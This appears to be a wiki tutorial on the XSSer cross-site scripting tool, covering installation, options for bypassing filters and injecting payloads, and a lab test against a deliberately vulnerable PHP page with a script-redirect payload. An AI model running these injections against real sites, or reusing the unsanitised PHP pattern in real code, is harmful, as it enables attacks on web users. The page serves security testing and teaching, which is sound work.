From aldeid
Jump to navigation Jump to search
This article could be partially or completely outdated and needs to be updated. Thank you for your comprehension.


XSSer is an open source penetration testing tool that automates the process of detecting and exploiting XSS injections against different applications.

It contains several options to try to bypass certain filters, and various special techniques of code injection.

Version 1.0 of XSSer is known as "The Mosquito" and is written by psy (0x3CAA25B3 ;-).



$ sudo apt-get install python \
  python-pycurl \
  python-beautifulsoup \

Installation of XSSer

Simple download

$ cd /data/src/
$ wget http://downloads.sourceforge.net/project/xsser/xsser-1.0.tar.gz
$ mkdir -p /pentest/web/
$ tar xvzf xsser-1.0.tar.gz -C /pentest/web/


$ mkdir -p /pentest/web/
$ svn co https://xsser.svn.sourceforge.net/svnroot/xsser xsser
$ chmod +x xsser/XSSer.py



$ ./XSSer.py [OPTIONS] [-u <url> |-i <file> |-d <dork>]
  [-g <get> |-p <post> |-c <crawl>] [Request(s)] [Vector(s)]
  [Bypasser(s)] [Technique(s)] [Final Injection(s)]



show program's version number and exit
-h, --help
show this help message and exit
-v, --verbose
verbose (default: no)
show statistics with all injection attempts responses
output all results directly to template (XSSlist.dat)
output 'positives' to aXML file (--xml filename.xml)
output 'positives' to Social Networks (identi.ca)
output -final code- shortered (tinyurl, is.gd)
create a false image with XSS code embedded
create a false .swf file with XSS code embedded
send a hash to pre-check if target repeats all content received (usefull to reduce 'false positive' results)
launch a browser at the end, with each 'positive' final code injection(s) discovered

Select Target(s)

At least one of these options has to be specified to set the source to get target(s) urls from. You need to choose to run XSSer:

-u <URL>, --url=<URL>
Enter target(s) to audit
Read target urls from a file
-d <DORK>
Process search engine dork results as target urls
Search engine to use for dorking (duck, altavista, bing, baidu, yandex, yebol, youdao, google, yahoo)

Select type of HTTP/HTTPS Connection(s)

These options can be used to specify which parameter(s) we want to use like payload to inject code.

Enter payload to audit using GET. (ex: '/menu.php?q=')
Enter payload to audit using POST. (ex: 'foo=1&bar=')
Crawl target hierarchy parameters (can be slow!)
Number of urls to visit when crawling (deeping level)

Configure Request(s)

These options can be used to specify how to connect to target(s) payload(s). You can select multiple:

Change your HTTP Cookie header
Change your HTTP User-Agent header (default SPOOFED)
Use another HTTP Referer header (default NONE)
Extra HTTP headers newline separated
HTTP Authentication type (value Basic or Digest)
HTTP Authentication credentials (value name:password)
Use proxy server (tor: http://localhost:8118)
Select your Timeout (default 30)
Delay in seconds between each HTTP request (default 8)
Maximum number of concurrent HTTP requests (default 1)
Retries when the connection timeouts (default 3)

Select Vector(s)

These options can be used to specify a XSS vector source code to inject in each payload. Important, if you don't want to try to inject a common XSS vector, used by default. Choose only one option:

OWN: Insert your XSS construction -manually-
AUTO: Insert XSSer 'reported' vectors from file

Select Bypasser(s)

These options can be used to encode selected vector(s) to try to bypass all possible anti-XSS filters on target(s) code and some IPS rules, if the target use it. Also, can be combined with other techniques to provide encoding:

Use method String.FromCharCode()
Use function Unescape()
Mix String.FromCharCode() and Unescape()
Use Decimal encoding
Use Hexadecimal encoding
Use Hexadecimal encoding, with semicolons
Encode vectors IP addresses in DWORD
Encode vectors IP addresses in Octal
Try -manually- different Character Encoding mutations
(reverse obfuscation: good) -> (ex: 'Mix,Une,Str,Hex')

Special Technique(s)

These options can be used to try to inject code using different type of XSS techniques. You can select multiple:

COO - Cross Site Scripting Cookie injection
XSA - Cross Site Agent Scripting
XSR - Cross Site Referer Scripting
DCP - Data Control Protocol injections
DOM - Use Anchor Stealth (DOM shadows! No server logging!)

Select Final injection(s)

These options can be used to specify the final code to inject in vulnerable target(s). Important, if you want to exploit on-the-wild your discovered vulnerabilities. Choose only one option:

OWN: Insert your final code to inject -manually-
REMOTE: Insert your final code to inject -remotely-
B64: Base64 code encoding in META tag (rfc2397)
DOS: XSS Denial of service (client) attack!!

Special Final injection(s)

These options can be used to execute some 'special' injection(s) in vulnerable target(s). You can select multiple and combine with your final code:

ONM: Use onMouseMove() event to inject code
IFR: Use <iframe> source tag to inject code


Proof of Concept


This example shows the simplest form of usage for XSSer:

$ ./XSSer.py -u "" -g "poc/XSS/index.php?xss=1" --auto

The following code is vulnerable to non-persistent (also called reflected) XSS attacks. Indeed, used with default value of secmode=0, user input (field "xss") is not sanitized before being displayed.

<title>Non persistent (reflected) XSS</title>
$secmode = 0;
// 0 = Nothing (no sec :)
// 1 = Remove "<" and ">"
// 2 = Remove "<script|SCRIPT>" and "</script|SCRIPT>"
// 3 = Remove "script|SCRIPT"
if(isset($_GET["xss"])) {
  switch($secmode) {
    case 3: $ban = array("script"); break;
    case 2: $ban = array("<script>", "</script>"); break;
    case 1: $ban = array("<", ">"); break;
    case 0: $ban = ""; break;
  $out = str_ireplace($ban, "", $_GET["xss"]);
  echo("<b>(SANITIZED) CONTENT: </b>");
  echo('<div style="border: solid 2px #ff0000; color: #ff0000; font-weight:bold;">'.$out.'</div>');
<hr />
<form method="get" action="index.php">
  <input type="text" style="width:200px" name="xss" />
  <input type="submit" />



Here are the results of XSSer run against this code, using different values of secmode. It tests the replacement of some strings from user inputs before displaying it.

Secmode 0

secmode 0
Sanitize filter Nothing (no sec :)
  • Injections: 82
  • Failed: 73
  • Sucessfull: 9
  • Accur: 10 %
Injection points

Secmode 1

secmode 1
Sanitize filter Remove "<" and ">"
  • Failed: 81
  • Sucessfull: 1
  • Accur: 1 %
Injection points
Notice the double slash (//) at the end of the payload. This vector enables to escape JavaScript escapes.

Secmode 2

secmode 2
Sanitize filter Remove "<script>", "<SCRIPT>", "</script>" and "</SCRIPT>"
  • Failed: 80
  • Sucessfull: 2
  • Accur: 2 %
Injection points

Secmode 3

secmode 3
Sanitize filter Remove "script" and "SCRIPT"
  • Failed: 81
  • Sucessfull: 1
  • Accur: 1 %
Injection points

Advanced examples

Manual payload

 $ ./XSSer.py -u "" -g "poc/xss/index.php?xss=" \
   --payload "<script>document.location='http://www.google.com'</script>"

XSSer v1.0: "The Mosquito" // (2010) - (Copyright - GPLv3.0) // by psy

Testing [XSS from URL] injections... you have your target good defined ;)

Target: --> 2011-02-08 21:25:02.477776

[+] Trying:<script>document.location='http://www.google.com'</script>
[+] Browser Support: [manual_injection]
[+] Checking: url attack with <script>document.location='http://www.google.com'</script>... ok

[*] Final Results:

- Injections: 1
- Failed: 0
- Sucessfull: 1
- Accur: 100 %

[*] List of possible XSS injections:

[I] Target:
[+] Injection:<script>document.location='http://www.google.com'</script>
[-] Method: manual

Go further

All these links have been taken from the official site:

For more information, visit the official website: http://xsser.sourceforge.net/